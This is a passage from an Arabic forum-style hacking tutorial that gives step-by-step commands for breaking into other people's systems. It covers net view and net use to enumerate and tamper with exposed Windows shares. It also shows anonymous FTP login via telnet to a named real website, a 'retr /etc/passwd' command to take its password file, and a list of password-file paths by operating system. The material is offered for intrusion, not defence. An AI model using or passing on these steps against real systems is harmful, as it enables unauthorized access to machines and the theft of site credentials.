ﻫﻨﺎ ﺃﻥ ﻧﺠﺪ ﺭﻗﻢ 20 ﻣﺎ ﺑﻴﻦ
ﺍﻷﻗﻮﺍﺱ ﻭﻫﺬﺍ ﻳﻌﻨﻰ ﺃﻧﻨﺎ ﻟﺪﻳﻨﺎ
PRINTER OR FILES SHARED
TURNED ON ، ﻭﻫﻮ ﻣﺎ ﻳﻌﻨﻰ ﺃﻧﻨﺎ
ﻟﺪﻳﻨﺎ ﺷﺨﺺ ﻟﺪﻳﺔ ﻣﻠﻔﺎﺕ ﻭﻃﺎﺑﻌﺔ
ﻳﻤﻜﻦ ﻣﺸﺎﺭﻛﺘﻬﺎ ﻋﺒﺮ ﺍﻹﻧﺘﺮﻧﺖ ﻭﻫﺬﺍ
ﻋﻴﺐ ﺧﻄﻴﺮ ﻓﻲ ﺃﻧﻈﻤﺔ ﺍﻟﺘﺸﻐﻴﻞ
ﻭﺛﻐﺮﺓ ﺧﻄﻴﺮﺓ ﻳﻤﻜﻦ ﺇﺳﺘﻐﻼﻟﻬﺎ ﻓﻲ
ﺇﺧﺘﺮﺍﻗﻪ.
-6 ﺍﻻﻥ ﻳﻤﻜﻨﻚ ﺍﻟﺘﻌﺮﻑ ﻋﻠﻰ
ﺍﻟﻤﻠﻔﺎﺕ ﺍﻟﺘﻰ ﻳﻤﻜﻦ ﻣﺸﺎﺭﻛﺘﻬﺎ ﺃﻭ
ﺍﻟﺘﻐﻴﻴﺮ ﻓﻴﻬﺎ ﻭﺍﻟﺘﻼﻋﺐ ﺑﻬﺎ ﻛﻴﻔﻤﺎ ﺗﺸﺎﺀ
ﻭﺫﻟﻚ ﺑﻜﺘﺎﺑﺔ ﺍﻷﻣﺮ ﺍﻟﺘﺎﻟﻰ ﻓﻲ ﺷﺎﺷﺔ
ﺍﻟﺪﻭﺱ:
Net view \\<insert ip_address
here>
-7 ﺳﻮﻑ ﻳﻈﻬﺮ ﻟﻚ ﺍﻟﺠﺪﻭﻝ ﺍﻟﺘﺎﻟﻰ
ﺍﻟﺬﻯ ﻳﺪﻝ ﻋﻠﻰ ﻭﺟﻮﺩ ﺍﻟﻤﻠﻔﺎﺕ ﺍﻟﺘﻰ
ﻳﻤﻜﻦ ﺍﻟﺘﻼﻋﺐ ﻓﻴﻬﺎ :
Shared resources at \
\ip_address
Sharename Type Comment
MY DOCUMENTS Disk
TEMP Disk
-8 ﺍﻻﻥ ﻳﻤﻜﻨﻚ ﺍﻟﺪﺧﻮﻝ ﺍﻟﻰ ﻣﻠﻒ
TEMP ﻭﺍﻟﺘﻼﻋﺐ ﻓﻴﻪ :
Net use x: \\<insert IP address
here>\temp
ﻃﺒﻌﺎ ﺇﺳﻠﻮﺏ NSETBIOS ﻣﺮ ﺑﺎﻟﻌﺪﻳﺪ
ﻣﻦ ﺍﻟﺘﻄﻮﺭﺍﺕ ، ﻧﻈﺮﺍ ﻷﻥ ﺍﻟﻌﺪﻳﺪ ﻣﻦ
ﺍﻟﻤﺴﺘﺨﺪﻣﻴﻦ ﻭﺃﻧﻈﻤﺔ ﺍﻟﺘﺸﻐﻴﻞ ﻗﺪ
ﺗﻼﻓﻮﺍ ﻫﺬﻩ ﺍﻟﺜﻐﺮﺓ ﺍﻟﺨﻄﻴﺮﺓ ﻟﺪﻳﻬﻢ ،
ﺑﺈﺫﻥ ﺍﻟﻠﻪ ﺳﺄﻗﺪﻡ ﺍﻟﻄﺮﻕ ﺍﻷﺧﺮﻯ
ﺍﻷﻛﺜﺮ ﺗﻄﻮﺭﺍ ﻓﻲ ﻭﻗﺖ ﻻﺣﻖ ..
* ﻟﻜﻲ ﺗﺴﺘﻄﻴﻊ ﺍﺧﺘﺮﺍﻕ ﻣﻮﻗﻊ ﻻ ﺑﺪ
ﺃﻥ ﺗﻌﺮﻑ ﺍﺳﻢ ﺍﻟﻤﺴﺘﺨﺪﻡ ﻭﻛﻠﻤﺔ
ﺍﻟﻤﺮﻭﺭ ﺍﻟﺨﺎﺻﺔ ﺑﺎﻟﻤﻮﻗﻊ
User name-Password
ﻭﻫﻤﺎ ﻳﻜﻮﻧﺎﻥ ﻣﺤﻔﻮﻇﻴﻦ ﻓﻲ ﻣﻠﻒ
ﻳﺴﻤﻲ
PASSWD ﻏﺎﻟﺒﺎ
ﺑﻌﺾ ﺍﻟﻤﻮﺍﻗﻊ ﺗﻀﻊ ﻫﺬﺍ ﺍﻟﻤﻠﻒ ﻓﻲ
ﺍﻹﻑ ﺗﻲ ﺑﻲ
ﻣﺎ ﻫﻮ ﺇﻑ ﺗﻲ ﺑﻲ؟
FTP=File Transfer Protocol
ﺑﺮﻭﺗﻮﻛﻮﻝ ﻧﻘﻞ ﺍﻟﻤﻠﻔﺎﺕ
ﺗﺴﺘﻄﻴﻊ ﺍﻻﺗﺼﺎﻝ ﺑﺎﻟﻤﻮﻗﻊ ﻭﺳﺤﺐ
ﻫﺬﺍ ﺍﻟﻤﻠﻒ ﻋﻦ ﻃﺮﻳﻖ ﺍﻟﺘﻠﻨﺖ
start==>run ﺇﺑﺪﺃ ﺛﻢ ﺗﺸﻐﻴﻞ
ﻭﺍﻛﺘﺐ telnet
ﺳﻴﻔﺘﺢ ﺍﻟﺘﻠﻨﺖ ﺍﺿﻐﻂ ﻋﻠﻰRemote
System ==> connect
ﺛﻢ ﺍﻛﺘﺐ ﺍﻟﻤﻮﻗﻊ ﻓﻲ Host Name
ﻣﺜﻼ
kahane.org ﺃﻭ ﺍﻵﻳﺒﻲ ﺍﻟﺨﺎﺹ ﺑﻪ
ﻭﻓﻲ PORT ﺍﻛﺘﺐ 21 ﻭﻫﻮ ﺍﻟﺒﻮﺭﺕ
ﺍﻟﺨﺎﺹ ﺑﺎﻹﻑ ﺗﻲ ﺑﻲ
ﺛﻢ ﺍﺿﻐﻂ connect
ﻭﺑﻌﺪ ﺃﻥ ﻳﻈﻬﺮ ﺭﺩ ﺍﻟﺴﻴﺮﻓﺮ ﺍﻛﺘﺐ
ﻭﻟﻜﻦ..ﻟﻦ ﺗﺮﻯ ﻣﺎ ﻛﺘﺒﺖ!! ﺷﻔﺮﺓ
source code
user anonymous
ﺛﻢ ﺍﻧﺘﺮ ﺑﻌﺪﻫﺎ ﻳﻄﻠﺐ ﺍﻟﺴﻴﺮﻓﺮ ﻛﻠﻤﺔ
ﺍﻟﺴﺮ ﺍﻛﺘﺐ
[وحدهم المديرون لديهم صلاحيات معاينة هذا الرابط]
ﺍﻛﺘﺐ ﺃﻱ ﺑﺮﻳﺪ ﻛﻜﻠﻤﺔ ﺳﺮ ﻭﻃﺒﻌﺎ
ﺳﻴﻜﻮﻥ ﻭﻫﻤﻴﺎ
ﻣﺎﺫﺍ ﻓﻌﻠﻨﺎ؟ﻟﻘﺪ ﺩﺧﻠﻨﺎ ﺇﻟﻰ ﺳﻴﺮﻓﺮ
ﺍﻟﻤﻮﻗﻊ ﻓﻲ ﻭﺿﻊ ﺍﻟﺘﺨﻔﻲ ﻭﺑﻌﺾ
ﺍﻟﻤﻮﺍﻗﻊ ﺗﺴﻤﺢ ﺑﻬﺬﻩ ﺍﻟﺨﺎﺻﻴﺔ
ﻭﺑﻌﻀﻬﺎ ﻻ ﻳﺴﻤﺢ..
ﺑﻌﺪﻫﺎ ﺳﻨﺤﺼﻞ ﻋﻠﻰ ﻣﻠﻒ
ﺍﻟﺒﺎﺳﻮﻭﺭﺩ
ﻗﺒﻞ ﺫﻟﻚ ﺃﺣﺐ ﺃﻥ ﺃﺫﻛﺮ ﺃﻧﻪ ﻳﻤﻜﻨﻚ
ﻋﻤﻞ ﺍﻷﺷﻴﺎﺀ ﺍﻟﺴﺎﺑﻘﺔ ﻋﻦ ﻃﺮﻳﻖ
ﺃﻱ ﺑﺮﻧﺎﻣﺞ ﺇﻑ ﺗﻲ ﺑﻲ ﻣﺜﻞ
cute ftp - ws_ftp
ﻣﺜﻼﺃﻭ ﺣﺘﻰ ﺍﻟﺬﻫﺎﺏ ﺇﻟﻰ ﺍﻟﻤﺘﺼﻔﺢ
ﻭﻛﺘﺎﺑﺔ ﺍﻟﻤﻮﻗﻊ ﻫﻜﺬﺍ ﻓﻲ ﺣﻘﻞ
ﺍﻟﻌﻨﻮﺍﻥ
[وحدهم المديرون لديهم صلاحيات معاينة هذا الرابط]
ﻟﺘﺤﺼﻞ ﻋﻠﻰ ﺍﻟﻤﻠﻒ ﻓﻲ ﺍﻟﺘﻠﻨﺖ ﺍﻛﺘﺐ
retr /etc/passwd
/etc ﻫﻮ ﺍﻟﻤﺠﻠﺪ ﺍﻟﺬﻱ ﻳﺤﺘﻮﻱ ﺍﻟﻤﻠﻒ
passwd ﻭﻳﺨﺘﻠﻒ ﺍﺳﻢ ﺍﻟﻤﺠﻠﺪ
ﻭﺍﺳﻢ ﻣﻠﻒ ﺍﻟﺒﺎﺳﻮﻭﺭﺩ ﺑﺎﺧﺘﻼﻑ
ﻧﻈﺎﻡ ﺗﺸﻐﻴﻞ ﺍﻟﻤﻮﻗﻊ
Sunos 5.0 etc/shadow ﺍﻭ etc/
passwd
Linux etc/shadow ﺍﻭ etc/
passwd
BSD4.3 –RENO etc/
master.passwd
AIX etc/security/passwd
NT ﻭﻳﻨﺪﻭﺯ scripts/passwd
ﻭﺗﺨﺘﻠﻒ ﺃﺳﻤﺎﺀ ﻣﻠﻒ ﺍﻟﺒﺎﺳﻮﻭﺭﺩ ﺑﻴﻦ
passwd ﻭ admin.pwl ﻭ ﻏﻴﺮﻫﺎ::
-------------------------------------
ﻓﻲ ﻣﻼﺣﻈﺔ ﺍﻟﻜﻞ ﺍﻻﻥ ﻳﻤﻜﻦ ﻗﺎﻋﺪ
ﻳﺪﻭﺭ ﻋﻠﻴﻬﺎ ﻭﻫﻲ ﻛﺎﻟﺘﺎﻟﻲ
=== ﻛﻴﻒ ﺍﻃﻠﻊ ip ﺍﻟﺨﺎﺹ ﻓﻴﻨﻲ
====
ﺍﻗﻠﻚ ﻛﻴﻒ ﺍﻟﻄﺮﻳﻘﺔ ﺍﺳﻬﻞ ﻣﻦ
ﺍﻟﺴﻬﻞ === ﺍﺩﺧﻞ ﺍﻟﺪﻭﺱ ﻭﺍﻛﺘﺐ
ﺍﻻﻣﺮ ﺍﻟﺘﺎﻝ(ipconfig)
ﺭﺍﺡ ﻳﻄﻠﻌﻠﻚ ﻣﻌﻠﻮﻣﺎﺕ ﻛﺘﻴﺮﻩ ﻭﻣﻦ
ﺿﻤﻨﻬﺎ ﻫﺎﻟﻤﻌﻠﻮﻣﻪ ﻫﻲ ) IPv4
Address. . . . . . . . . . . :
192.***.*.3(
ﺍﺗﻤﻨﻰ ﺗﻜﻮﻥ ﻭﺿﺤﺔ ﺍﻟﺼﻮﺭﻩ
